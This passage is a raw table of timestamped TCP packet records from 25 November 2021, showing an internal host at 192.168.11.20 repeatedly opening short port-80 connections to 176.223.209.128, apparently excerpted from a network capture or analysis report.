Nov 25, 2021 10:52:15.320163965 CET	80	50326	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:15.320229053 CET	80	50326	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:15.320487022 CET	50326	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:15.320539951 CET	50326	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:15.353950024 CET	80	50326	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:15.671713114 CET	50327	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:15.705557108 CET	80	50327	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:15.705764055 CET	50327	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:15.707320929 CET	50327	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:15.741161108 CET	80	50327	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:15.741425037 CET	50327	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:15.775331020 CET	80	50327	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:15.799293995 CET	80	50327	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:15.799341917 CET	80	50327	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:15.799510002 CET	50327	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:15.799560070 CET	50327	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:15.833683968 CET	80	50327	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.168678999 CET	50328	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.202826023 CET	80	50328	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.202971935 CET	50328	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.204602957 CET	50328	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.238581896 CET	80	50328	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.238796949 CET	50328	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.272975922 CET	80	50328	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.295562983 CET	80	50328	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.295618057 CET	80	50328	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.295799017 CET	50328	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.295883894 CET	50328	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.330075026 CET	80	50328	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.684437037 CET	50329	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.717874050 CET	80	50329	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.718084097 CET	50329	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.719602108 CET	50329	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.753011942 CET	80	50329	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.753187895 CET	50329	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.786787987 CET	80	50329	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.805646896 CET	80	50329	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.805716991 CET	80	50329	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:16.805872917 CET	50329	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.805937052 CET	50329	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:16.839469910 CET	80	50329	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.191862106 CET	50330	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.226062059 CET	80	50330	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.226299047 CET	50330	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.227828979 CET	50330	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.261914968 CET	80	50330	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.262125015 CET	50330	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.296416044 CET	80	50330	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.314026117 CET	80	50330	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.314090967 CET	80	50330	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.314244032 CET	50330	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.314306974 CET	50330	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.348582029 CET	80	50330	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.723432064 CET	50331	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.756952047 CET	80	50331	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.757221937 CET	50331	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.758847952 CET	50331	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.792419910 CET	80	50331	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.792740107 CET	50331	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.826308966 CET	80	50331	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.842144966 CET	80	50331	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.842195988 CET	80	50331	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:17.842382908 CET	50331	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.842444897 CET	50331	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:17.876032114 CET	80	50331	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.230158091 CET	50332	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.263515949 CET	80	50332	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.263720989 CET	50332	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.265321016 CET	50332	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.298681974 CET	80	50332	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.298950911 CET	50332	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.332283020 CET	80	50332	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.348356009 CET	80	50332	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.348431110 CET	80	50332	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.348629951 CET	50332	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.348685980 CET	50332	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.382019043 CET	80	50332	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.721518040 CET	50333	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.755390882 CET	80	50333	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.755633116 CET	50333	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.757230997 CET	50333	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.791277885 CET	80	50333	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.791583061 CET	50333	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.825520992 CET	80	50333	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.841252089 CET	80	50333	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.841315985 CET	80	50333	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:18.841619015 CET	50333	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.841677904 CET	50333	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:18.875767946 CET	80	50333	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.224421978 CET	50334	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.258419991 CET	80	50334	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.258608103 CET	50334	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.260157108 CET	50334	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.294126987 CET	80	50334	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.294414997 CET	50334	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.328428984 CET	80	50334	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.345704079 CET	80	50334	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.345746040 CET	80	50334	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.345951080 CET	50334	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.345982075 CET	50334	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.380161047 CET	80	50334	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.745745897 CET	50335	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.779225111 CET	80	50335	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.779480934 CET	50335	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.780977964 CET	50335	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.814419031 CET	80	50335	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.814631939 CET	50335	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.848000050 CET	80	50335	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.863940954 CET	80	50335	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.864013910 CET	80	50335	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:19.864175081 CET	50335	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.864239931 CET	50335	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:19.897703886 CET	80	50335	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.249404907 CET	50336	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.283571005 CET	80	50336	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.283772945 CET	50336	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.285330057 CET	50336	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.319286108 CET	80	50336	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.319498062 CET	50336	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.353640079 CET	80	50336	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.387083054 CET	80	50336	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.387147903 CET	80	50336	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.387275934 CET	50336	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.387360096 CET	50336	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.421467066 CET	80	50336	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.681716919 CET	50337	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.714989901 CET	80	50337	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.715214014 CET	50337	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.716730118 CET	50337	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.749916077 CET	80	50337	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.750154972 CET	50337	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.783431053 CET	80	50337	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.803515911 CET	80	50337	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.803571939 CET	80	50337	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:20.803852081 CET	50337	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.803947926 CET	50337	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:20.837359905 CET	80	50337	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.202827930 CET	50338	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.235980034 CET	80	50338	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.236231089 CET	50338	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.237790108 CET	50338	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.271034002 CET	80	50338	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.271239042 CET	50338	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.304579973 CET	80	50338	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.325181961 CET	80	50338	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.325270891 CET	80	50338	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.325449944 CET	50338	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.325511932 CET	50338	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.358895063 CET	80	50338	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.679002047 CET	50339	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.713198900 CET	80	50339	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.713433027 CET	50339	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.714998007 CET	50339	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.748964071 CET	80	50339	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.749106884 CET	50339	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.783077002 CET	80	50339	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.807549953 CET	80	50339	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.807599068 CET	80	50339	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:21.807746887 CET	50339	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.807795048 CET	50339	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:21.841898918 CET	80	50339	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.191692114 CET	50340	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.225106955 CET	80	50340	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.225301981 CET	50340	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.226974964 CET	50340	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.260508060 CET	80	50340	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.260694981 CET	50340	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.294260025 CET	80	50340	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.313255072 CET	80	50340	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.313327074 CET	80	50340	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.313628912 CET	50340	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.313747883 CET	50340	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.347430944 CET	80	50340	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.708529949 CET	50341	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.742645025 CET	80	50341	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.742870092 CET	50341	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.744389057 CET	50341	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.778434038 CET	80	50341	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.778665066 CET	50341	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.812670946 CET	80	50341	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.829025030 CET	80	50341	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.829073906 CET	80	50341	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:22.829319954 CET	50341	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.829370022 CET	50341	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:22.863486052 CET	80	50341	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.235135078 CET	50342	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.268660069 CET	80	50342	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.268861055 CET	50342	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.270426035 CET	50342	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.303776026 CET	80	50342	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.303985119 CET	50342	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.337384939 CET	80	50342	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.354069948 CET	80	50342	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.354118109 CET	80	50342	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.354289055 CET	50342	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.354520082 CET	50342	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.387465000 CET	80	50342	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.734651089 CET	50343	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.768691063 CET	80	50343	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.768965006 CET	50343	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.770524979 CET	50343	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.804553032 CET	80	50343	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.804945946 CET	50343	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.839186907 CET	80	50343	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.855377913 CET	80	50343	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.855446100 CET	80	50343	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:23.855642080 CET	50343	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.855741024 CET	50343	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:23.889986992 CET	80	50343	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.234888077 CET	50344	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.268305063 CET	80	50344	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.268501997 CET	50344	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.270030022 CET	50344	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.303375959 CET	80	50344	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.303558111 CET	50344	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.336858988 CET	80	50344	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.353456020 CET	80	50344	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.353504896 CET	80	50344	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.353687048 CET	50344	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.353735924 CET	50344	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.387165070 CET	80	50344	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.668349981 CET	50345	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.701570988 CET	80	50345	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.701730967 CET	50345	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.703352928 CET	50345	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.736495018 CET	80	50345	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.736711979 CET	50345	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.769921064 CET	80	50345	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.805270910 CET	80	50345	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.805334091 CET	80	50345	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:24.805613041 CET	50345	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.805695057 CET	50345	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:24.839148045 CET	80	50345	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.161756039 CET	50346	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.195960999 CET	80	50346	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.196202040 CET	50346	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.197757959 CET	50346	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.231772900 CET	80	50346	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.232018948 CET	50346	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.266206026 CET	80	50346	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.303616047 CET	80	50346	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.303679943 CET	80	50346	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.303927898 CET	50346	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.304269075 CET	50346	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.337995052 CET	80	50346	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.654736042 CET	50347	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.688201904 CET	80	50347	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.688448906 CET	50347	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.690005064 CET	50347	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.723259926 CET	80	50347	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.723462105 CET	50347	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.756715059 CET	80	50347	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.791414976 CET	80	50347	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.791470051 CET	80	50347	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:25.791749001 CET	50347	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.791831970 CET	50347	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:25.825494051 CET	80	50347	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.189372063 CET	50348	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.223356009 CET	80	50348	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.223606110 CET	50348	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.225157022 CET	50348	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.258975983 CET	80	50348	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.259187937 CET	50348	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.293030024 CET	80	50348	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.315299988 CET	80	50348	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.315325975 CET	80	50348	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.315506935 CET	50348	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.315531015 CET	50348	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.349551916 CET	80	50348	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.708031893 CET	50349	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.742139101 CET	80	50349	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.742387056 CET	50349	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.744009018 CET	50349	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.777993917 CET	80	50349	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.778235912 CET	50349	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.812267065 CET	80	50349	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.827974081 CET	80	50349	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.828048944 CET	80	50349	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:26.828238964 CET	50349	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.828289032 CET	50349	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:26.862181902 CET	80	50349	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.217355013 CET	50350	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.250489950 CET	80	50350	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.250637054 CET	50350	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.252180099 CET	50350	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.285289049 CET	80	50350	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.285602093 CET	50350	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.318804979 CET	80	50350	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.335648060 CET	80	50350	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.335696936 CET	80	50350	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.335907936 CET	50350	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.335959911 CET	50350	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.369373083 CET	80	50350	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.729043007 CET	50351	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.763086081 CET	80	50351	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.763422966 CET	50351	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.764926910 CET	50351	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.798968077 CET	80	50351	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.799151897 CET	50351	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.833362103 CET	80	50351	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.849395990 CET	80	50351	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.849459887 CET	80	50351	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:27.849606037 CET	50351	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.849669933 CET	50351	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:27.883910894 CET	80	50351	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.228144884 CET	50352	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.261533976 CET	80	50352	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.261821985 CET	50352	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.263374090 CET	50352	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.296710968 CET	80	50352	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.296890974 CET	50352	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.330197096 CET	80	50352	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.348093033 CET	80	50352	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.348141909 CET	80	50352	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.348261118 CET	50352	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.348294020 CET	50352	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.381833076 CET	80	50352	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.711431026 CET	50353	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.745594025 CET	80	50353	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.745733023 CET	50353	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.747392893 CET	50353	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.781438112 CET	80	50353	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.781620026 CET	50353	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.815635920 CET	80	50353	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.834002972 CET	80	50353	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.834059000 CET	80	50353	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:28.834230900 CET	50353	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.834270954 CET	50353	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:28.868396997 CET	80	50353	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.142698050 CET	50354	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.176754951 CET	80	50354	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.177000046 CET	50354	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.178594112 CET	50354	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.212750912 CET	80	50354	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.213073015 CET	50354	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.247179985 CET	80	50354	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.265156984 CET	80	50354	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.265208006 CET	80	50354	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:29.265413046 CET	50354	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:29.265465975 CET	50354	80	192.168.11.20	176.223.209.128
